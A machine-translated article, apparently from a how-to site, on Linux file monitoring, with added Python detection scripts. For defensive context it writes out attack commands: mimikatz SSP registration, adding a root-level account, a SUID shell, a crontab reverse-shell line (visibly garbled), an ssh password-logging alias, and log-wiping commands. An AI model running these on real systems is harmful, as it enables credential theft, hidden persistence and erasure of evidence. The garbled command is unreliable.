
How to realize File Monitoring by Linux

2025-04-05 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)05/31 Report--

This article introduces the relevant knowledge of "how to realize file monitoring in Linux". Many people run into difficulties with this in real cases, so the editor walks through how to handle those situations. I hope you read carefully and learn something from it!

0x01: Preface

An earlier article introduced the direction of Linux host detection from the macro point of view, based on the ATT&CK matrix (Linux system security practices based on the ATT&CK matrix). The later articles in the series narrow the scope level by level, finally starting from each individual technical point. This article likewise takes the attacker's point of view in order to build defense.

Linux file monitoring is a very important part of security protection: it can identify suspicious tampering and file permission changes and detect malicious code in time. Take webshells as an example. There are many ways to detect a webshell today: HTTP traffic, web access logs, file-feature-based detection (webshell variable names, dangerous function names and so on), and dynamic sandboxes and machine learning. File-feature-based detection is convenient to deploy (a single script is enough), has a high accuracy rate, extends well, and new rules can be added and run at any time. Of course, if the file's characteristic values are modified, it is likely to be bypassed. Malicious samples can be identified and analyzed on the principle of text and binary signature matching, through the command line or Python scripts with the yara-python extension.

Why use file monitoring for protection? Is a full-text search necessary to find malicious files? How can the search volume be reduced?

Setting overflow vulnerabilities aside, and based on the principle that everything in Linux is a file, an attack ultimately comes down to modifying files and executable files. Comparing the hashes of the current files against the SVN copy or the original directory identifies the inconsistent files; by investigating new and modified files, the webshell uploaded by the attacker can be found. (The same principle applies to diff.) Command and control, persistence and lateral movement cleanup also require file modifications.
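The hash comparison described above, as an added example that is not part of the original article: a baseline of SHA-256 digests is taken for a directory, and a second pass reports files that are new, modified or deleted. The web root and its contents are constructed in a temporary directory.

```python
"""Baseline-and-compare file integrity check (added example, not from the
original article). Hashes every regular file under a directory, keeps the
result as a baseline, and reports files that are new, modified or deleted
relative to that baseline."""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Return {relative_path: sha256 hex digest} for all regular files under root."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if not os.path.isfile(path) or os.path.islink(path):
                continue  # skip sockets, devices and symlinks
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[os.path.relpath(path, root)] = h.hexdigest()
    return digests


def compare(baseline, current):
    """Return (added, modified, deleted) lists of relative paths."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return added, modified, deleted


def demo():
    """Constructed web root: baseline it, then add one file and alter another."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "upload"))
    with open(os.path.join(root, "index.php"), "w") as fh:
        fh.write("<?php echo 'hello'; ?>\n")
    baseline = hash_tree(root)
    # changes an investigator would want reported: a new file under upload/
    # and an existing file whose content no longer matches the baseline
    with open(os.path.join(root, "upload", "x.php"), "w") as fh:
        fh.write("<?php /* constructed: unexpected upload */ ?>\n")
    with open(os.path.join(root, "index.php"), "a") as fh:
        fh.write("// constructed: appended content\n")
    return compare(baseline, hash_tree(root))


if __name__ == "__main__":
    print(demo())
```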

0x02: Open Source Implementable File Monitoring Project OSSEC

OSSEC can check files for modifications, for changes in their contents, in their attributes, and so on. File monitoring is configured in the ossec.conf file.

File monitoring content audit

The audit tool (auditd) can monitor file usage: which process reads and writes a file, and modifications to its attributes. For example, the following rule watches a directory for writes (w), executes (x), reads (r) and attribute changes (a):

auditctl -w /home/wt7315 -p wxra

0x03: Directories to Monitor

The /etc directory holds the system's main configuration files; almost all of them are placed here, such as the account and password files and the startup files of the various services.

/bin mainly holds the execution files the system requires: the binaries needed by users and administrators. The directories to monitor are therefore:

/bin

/usr/bin

/sbin

/usr/sbin

/etc

0x04: File monitoring from the attacker's perspective: information collection and credential acquisition

In Windows domain penetration, passwords can be obtained from the SAM file and plaintext login passwords with mimikatz. A Security Support Provider (SSP) is a DLL whose main function is to extend the Windows authentication mechanism; it is loaded during lsass.exe startup. Combining the DLL with the registry: copy mimilib.dll from the mimikatz package into the target machine's system32 folder, then add a new value under the path hklm\system\currentcontrolset\control\lsa:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ

When a user logs in, the plaintext password is recorded under the same path (System32), and it is still recorded after a restart.

mimikatz can also be injected into memory. When users log in, the login account password is stored in mimilsa in the System32 folder.

To retrieve passwords and hashes from memory on Linux, the memory mapping file of the process to be analyzed must be opened in the /proc file system. It is stored at /proc/$pid/maps, where $pid is the unique PID of the program to be queried for such authentication data.

Use mimipenguin: github.com/huntergreg

File monitoring in the persistence phase

(1.) Boot process: the RHEL 6 boot process differs from RHEL 7, which uses systemd for process initialization.

For programs that support service, a configuration file is automatically added to the /etc/init.d directory during installation. Running service httpd start launches the /usr/sbin/httpd pointed to by the /etc/init.d/httpd configuration file.

For programs that support systemd, installation automatically adds a configuration file to the /usr/lib/systemd/system directory. When systemctl is used to control the program, systemctl start httpd.service launches the executable file /usr/sbin/httpd pointed to by the httpd.service configuration.

(2.) Linux init: Before systemd became mainstream, sysvinit was the choice of most distributions; even upstart, which Ubuntu used earlier, is fully compatible with sysvinit, and Debian distributions still retain sysvinit compatibility to this day. The Linux init program, PID 1, is responsible for all processes after startup and all services are managed by it, which makes it a common place to implement rootkits. For traditional sysvinit, the common residency points must be written as root:

/etc/init.d

/etc/rc[runlevel].d

/etc/rc.local

For systemd there are more ways to achieve residency, some even without root privileges:

/etc/systemd/system

/etc/systemd/user

/lib/systemd/system

/lib/systemd/user

~/.local/share/systemd/user

~/.config/systemd/user

(3.) Both bashrc and profile store the user's shell environment: bashrc is read by interactive non-login shells and profile by interactive login shells. There are many bashrc and profile files on a system.

(4.) Run commands (rc files)

Files that begin or end with rc:

rcxinetd,~/.bashrc and other files

rc.d and rcX.d etc.

(5.) Graphical environment

Desktop environments such as GNOME and Xorg are common, and often overlooked, places to install persistence.

(6.) Scheduled tasks

crond is the daemon that periodically executes tasks or waits for events to process on Linux. Users control their scheduled tasks with the crontab command; the system task schedule and the user schedules it reads live under /var/spool/cron/ and /etc/cron*.

(7.) Dynamic link library hijacking

Linux dynamic link library loading order:

The run path specified at compile time

The places specified by LD_LIBRARY_PATH

The places specified by ldconfig

/lib

/usr/lib

Replacing a dynamic link library: libc is called by almost every ELF, and specific libraries by specific ELFs. As long as a given ELF is executed often enough, a .so it links against can be replaced with a recompiled malicious .so to achieve execution of malicious code.

ld.so.preload: the most common implementation is to write the .so that libc should load into /etc/ld.so.preload, or to set the LD_PRELOAD environment variable in the shell startup files:

/etc/profile

~/.bashrc

~/.bash_profile

~/.bash_logout
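A defender-side check for the preload points just listed, as an added example that is not from the article: it reads an ld.so.preload file and a set of shell profile files, collects every preloaded library, and flags those outside the standard library directories. The file paths are parameters and the inputs below are constructed.

```python
"""Added example (not from the article): audit the dynamic-linker preload
points. Reads /etc/ld.so.preload (whitespace-separated library paths) and
shell profile files (LD_PRELOAD=... assignments) and reports libraries that
do not live under the standard library directories."""
import os
import re
import tempfile

# trailing slash so "/libfoo.so" at the root is not mistaken for "/lib/"
STANDARD_LIB_DIRS = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
LD_PRELOAD_RE = re.compile(r"\bLD_PRELOAD\s*=\s*[\"']?([^\"'\s;]+)")


def preload_entries(preload_file, profile_files):
    """Yield (source_file, library_path) for every preload declaration found."""
    if os.path.isfile(preload_file):
        with open(preload_file) as fh:
            for line in fh:
                for lib in line.split("#", 1)[0].split():
                    yield preload_file, lib
    for prof in profile_files:
        if not os.path.isfile(prof):
            continue
        with open(prof) as fh:
            for line in fh:
                m = LD_PRELOAD_RE.search(line.split("#", 1)[0])
                if m:
                    for lib in m.group(1).split(":"):  # LD_PRELOAD may list several
                        yield prof, lib


def suspicious_preloads(preload_file, profile_files):
    """Return the entries whose library is outside the standard lib directories."""
    return [(src, lib) for src, lib in preload_entries(preload_file, profile_files)
            if not lib.startswith(STANDARD_LIB_DIRS)]


def demo():
    """Constructed files: one library under /usr/lib, one under /tmp, one via .bashrc."""
    d = tempfile.mkdtemp()
    preload = os.path.join(d, "ld.so.preload")
    bashrc = os.path.join(d, ".bashrc")
    with open(preload, "w") as fh:
        fh.write("/usr/lib/libbenign.so\n/tmp/.x/libhook.so  # constructed\n")
    with open(bashrc, "w") as fh:
        fh.write("alias ll='ls -l'\nexport LD_PRELOAD=/home/user/.h/libhook.so\n")
    return suspicious_preloads(preload, [bashrc, os.path.join(d, "missing")])
```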

File monitoring in the permission maintenance phase

The common backdoor techniques for maintaining access are listed below, moving from the backdoor technique to what file monitoring should watch.

(1) Add super user account

echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd

(2) Crack or sniff user passwords

After obtaining the shadow file, use the John the Ripper tool to crack weak user passwords. In the situations I used it, only some simple common passwords could be cracked; the other passwords are hard to recover. In addition, hashcat on GPUs or distributed servers can be used for cracking.

(3) Place a SUID shell

A normal user can then run /dev/.rootshell locally to get a shell with root privileges.

cp /bin/bash /dev/.rootshell

chmod u+s /dev/.rootshell

(4) Crontab scheduled task

(crontab -l;printf "*/5 * * * * exec9 /dev/tcp/localhost/8080&&exec0&92>&1&&/bin/bash --noprofile -I;rno crontab forwhoami0cn")|crontab -

(5) Alias backdoor in the current user's .bashrc:

alias ssh='strace -o /tmp/sshpwd-date '+%d%h%m% s'. log -e read,write,connect -s2048 ssh'

(6) PAM backdoor: modify pam_unix_auth.c in PAM or OpenSSH to add a universal password

And so on; all of these require adding new files or modifying existing ones.
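Two checks for the backdoors listed above, as an added example that is not from the article: one parses passwd text for UID 0 accounts other than root (technique 1), the other walks a tree for set-user-ID executables outside the directories where they belong (technique 3). The passwd content and the file tree are constructed; the allowed SUID directories are an assumption to adjust per host.

```python
"""Added example (not from the article): detect an added UID 0 account and
a SUID binary placed outside the expected system directories."""
import os
import stat
import tempfile


def find_uid0_accounts(passwd_text):
    """Return usernames with UID 0 that are not 'root'."""
    hits = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            hits.append(fields[0])
    return hits


def find_unexpected_suid(root, expected_dirs):
    """Return SUID regular files under root whose directory (relative to root)
    is not in expected_dirs. lstat is used so symlinks are never followed."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                if os.path.relpath(dirpath, root) not in expected_dirs:
                    hits.append(os.path.relpath(path, root))
    return sorted(hits)


def demo():
    """Constructed passwd content and a fake root with a hidden SUID shell."""
    passwd = ("root:x:0:0:root:/root:/bin/bash\n"
              "mx7krshell:x:0:0::/:/bin/sh\n"
              "www:x:33:33::/var/www:/usr/sbin/nologin\n")
    root = tempfile.mkdtemp()
    for rel in ("usr/bin/passwd", "dev/.rootshell"):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, 0o4755)  # set-user-ID, like the chmod u+s above
    expected = {"bin", "sbin", "usr/bin", "usr/sbin"}  # assumption per host
    return find_uid0_accounts(passwd), find_unexpected_suid(root, expected)
```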

File monitoring in the trace cleanup phase

(1) Clean up the current user's history only: history -c

(2) Make the system no longer save command records: open /etc/profile with vi, find the HISTSIZE value and change it to 0

(3) Delete records

Delete login failure records: echo > /var/log/btmp

Delete login success records: echo > /var/log/wtmp

Delete log records: echo > /var/log/secure

(4) Do not record the remote host's key in the local .ssh directory (known_hosts):

ssh -o UserKnownHostsFile=/dev/null -T user@host /bin/bash -i

(5) Log in so that the account is invisible to the administrator's w command:

ssh -T somebody@8.8.8.8 /bin/bash -i
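Checks that catch the cleanup steps above, as an added example that is not from the article: wtmp and btmp are arrays of fixed-size records, so a size of zero or one that is not a multiple of the record size (such as the single newline left by echo > file) shows they were emptied; a text log shorter than one line is flagged the same way; and profile lines that set HISTSIZE or HISTFILESIZE to 0 or unset HISTFILE are reported. The record size of 384 bytes is glibc's struct utmp on x86_64 and is an assumption to adjust per platform; all files are constructed.

```python
"""Added example (not from the article): detect emptied login records,
truncated text logs and shell history being switched off."""
import os
import re
import tempfile

UTMP_RECORD = 384  # assumption: sizeof(struct utmp) for glibc on x86_64
HISTORY_OFF_RE = re.compile(
    r"^\s*(?:export\s+)?HIST(?:FILE)?SIZE\s*=\s*0\s*$|^\s*unset\s+HISTFILE\b")


def tampered_login_records(paths, record_size=UTMP_RECORD):
    """Return wtmp/btmp-style files that are empty or not record aligned."""
    hits = []
    for p in paths:
        if not os.path.isfile(p):
            continue
        size = os.path.getsize(p)
        if size == 0 or size % record_size:
            hits.append(p)
    return hits


def truncated_text_logs(paths, min_bytes=2):
    """Return text logs (e.g. secure) holding less than one real line."""
    return [p for p in paths if os.path.isfile(p) and os.path.getsize(p) < min_bytes]


def history_disabled(profile_path):
    """Return the lines of profile_path that turn shell history off."""
    if not os.path.isfile(profile_path):
        return []
    with open(profile_path) as fh:
        return [ln.rstrip("\n") for ln in fh if HISTORY_OFF_RE.match(ln)]


def demo():
    """Constructed files mirroring the cleanup commands; returns basenames."""
    d = tempfile.mkdtemp()
    wtmp, btmp, secure, profile = (os.path.join(d, n)
                                   for n in ("wtmp", "btmp", "secure", "profile"))
    with open(wtmp, "wb") as fh:
        fh.write(b"\x00" * (2 * UTMP_RECORD))  # two intact records, untouched
    with open(btmp, "wb") as fh:
        fh.write(b"\n")                        # what `echo > /var/log/btmp` leaves
    with open(secure, "wb") as fh:
        fh.write(b"\n")                        # what `echo > /var/log/secure` leaves
    with open(profile, "w") as fh:
        fh.write("PATH=$PATH:/usr/local/bin\nHISTSIZE=0\nexport HISTSIZE\n")
    base = os.path.basename
    return ([base(p) for p in tampered_login_records([wtmp, btmp])],
            [base(p) for p in truncated_text_logs([secure])],
            history_disabled(profile))
```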

The content of "How to realize file monitoring in Linux" ends here. Thank you for reading. If you want to know more about industry-related knowledge, you can follow the website; the editor will publish more high-quality practical articles for everyone!
